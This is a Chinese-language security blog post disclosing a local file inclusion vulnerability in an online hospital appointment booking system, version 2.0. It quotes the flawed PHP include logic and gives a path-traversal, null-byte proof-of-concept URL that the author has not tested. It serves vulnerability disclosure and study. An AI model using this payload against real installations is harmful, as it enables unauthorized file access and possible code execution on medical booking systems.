网上在线挂号预约管理系统 v2.0 本地包含漏洞

admin

138858
文章

114
评论

2021年4月3日20:08:14评论75 views字数 900阅读3分0秒阅读模式

看到各位大牛为了为了版主拼命挖洞，不知不觉带动了偶熄灭已久的基情。

在网上查了下，貌似没有这个程序的漏洞信息，就发出来交流学习，反正偶也要洞木有用。

在网上随便找了下，漏洞很简单，只为了学习与交流。大牛飘过。看如下代码:

Index.php：

@extract($_GET,EXTR_PREFIX_ALL,"g"); //所有提交函数加前缀g,提交o就变成g_o
if(isset($_POST['submit']) || isset($g_submit)){
@check_post_request();
@extract($_POST,EXTR_PREFIX_ALL,"p");
} //如果post有数据先检查，然后赋值。

session_cache_limiter('private,must-revalidate');
if(!isset($_SESSION)){
session_start();
}
$db = new c_mysql;
$g_m = (isset($g_m) && in_array_key($g_m,$config['model'])) ? $g_m : 'login';
$g_o = isset($g_o) ? $g_o : ''; //木有过滤
….
….
…
$operate_file = 'model/'.$g_m."_".$g_o.".php";
if(file_exists($operate_file)) //如果存在就包含
include($operate_file);

create_html();
?>

由于搭建失败，我是直接看代码未测试。给出测试代码：

http://127.0.0.1/index.php?o=/../../1.php%00

文章来源于lcx.cc:网上在线挂号预约管理系统 v2.0 本地包含漏洞

相关推荐: 美核武专家称朝鲜可能已研制出电磁脉冲武器

电磁脉冲武器（资料图片）　　中新网6月24日电据韩联社援引美国媒体24日报道，美国核武专家认为朝鲜有可能成功研制了电磁脉冲(EMP)武器。　　EMP是核武在高空爆炸时产生的超强电磁场(俗称电磁脉冲)，会对用电设备或电子设备发生耦合，并产生具破坏性的电流和…

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

网上在线挂号预约管理系统 v2.0 本地包含漏洞

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信